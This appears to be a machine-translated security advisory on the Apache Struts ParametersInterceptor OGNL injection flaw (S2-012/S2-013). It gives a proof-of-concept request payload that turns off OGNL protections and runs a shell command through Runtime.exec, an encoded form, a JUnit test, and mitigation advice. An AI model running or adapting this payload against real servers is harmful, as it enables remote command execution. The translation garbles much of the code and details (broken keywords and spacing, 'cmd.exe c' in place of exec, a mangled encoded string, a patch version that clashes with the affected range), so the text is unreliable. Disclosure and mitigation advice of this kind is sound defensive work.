Apache Struts "ParameterInterceptor" Security Bypass Vulnerability

Release date:
Updated on: 2013-05-23

Affected Systems:
Apache Group Struts 2.0.0-2.3.14
Description:
--------------------------------------------------------------------------------
Apache Struts is an open-source web application framework for developing Java Web applications.
 
Apache Struts 2.3.14.1 and earlier versions have errors in the implementation of the "ParameterInterceptor" class. You can modify the server object or use a special OGNL expression to bypass ParametersInterceptor and OGNL Library Protection, to execute any command.
 
<* Source: Xgc Kxlzx

Link: http://secunia.com/advisories/53495/
Http://struts.apache.org/development/2.x/docs/s2-012.html
Http://struts.apache.org/development/2.x/docs/s2-013.html
Http://www.freebuf.com/vuls/9757.html
Http://struts.apache.org/development/2.x/docs/security-bulletins.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Proof of concept
Vulnerable Action
Public class FooAction {
Private String foo;
 
Public String execute (){
Return "success ";
}
Public String getFoo (){
Return foo;
}
 
Public void setFoo (String foo ){
This. foo = foo;
}
}
 
Here's an actual decoded example, which will create/tmp/PWNAGE directory:
 
/Action? Foo = (# context ["xwork. methodAccessor. denyMethodExecution "] = new java. lang. boolean (false), # _ memberAccess ["allowStaticMethodAccess"] = new java. lang. boolean (true), @java.lang.runtime@getruntime(cmd.exe c ('mkdir/tmp/pwnage') (meh) & z [(foo) ('meh')] = true
Encoded version:
 
/Action? Export c % 28% 27 mkdir % 20/tmp/PWNAGE % 27% 29% 29% 28meh % 29 & z [% 28foo % 29% 28% 27meh % 27% 29] = true
And the JUnit version
 
PoC
Public class FooActionTest extends org. apache. struts2.StrutsJUnit4TestCase <FooAction> {
@ Test
Public void testExecute () throws Exception {
Request. setParameter ("foo", "(# context [\" xwork. MethodAccessor. denyMethodExecution \ "] = new" +
"Java. lang. Boolean (false), # _ memberAccess [\" allowStaticMethodAccess \ "] = new java. lang. Boolean (true)," +
"@Java.lang.runtime@getruntime(cmd.exe c ('mkdir/tmp/pwnage') (meh )");
 
Request. setParameter ("top ['foo'] (0)", "true ");
 
String res = this.exe cuteAction ("/example/foo. action ");
FooAction action = this. getAction ();
 
File pwn = new File ("/tmp/PWNAGE ");
Assert. assertFalse ("Remote exploit: The PWN folder has been created", pwn. exists ());
}
}

Suggestion:
--------------------------------------------------------------------------------
Temporary solution:
 
If you cannot install or upgrade the patch immediately, NSFOCUS recommends that you take the following measures to reduce the threat:
 
* Configure ParametersIntercptor in struts. xml to exclude malicious parameters. In addition, the following interceptor-ref configuration can be correctly applied to allow simple navigation expressions only:
<Interceptor-ref name = "params">
<Param name = "acceptParamNames"> \ w + ((\. \ w +) | (\ [\ d + \]) | (\ ['\ w +' \]) * </param>
</Interceptor-ref>
 
Vendor patch:
 
Apache Group
------------
The vendor has released a patch to fix this security problem. Please download Struts 2.3.1.2 from the vendor's homepage:
 
Http://struts.apache.org/download.cgi#struts2312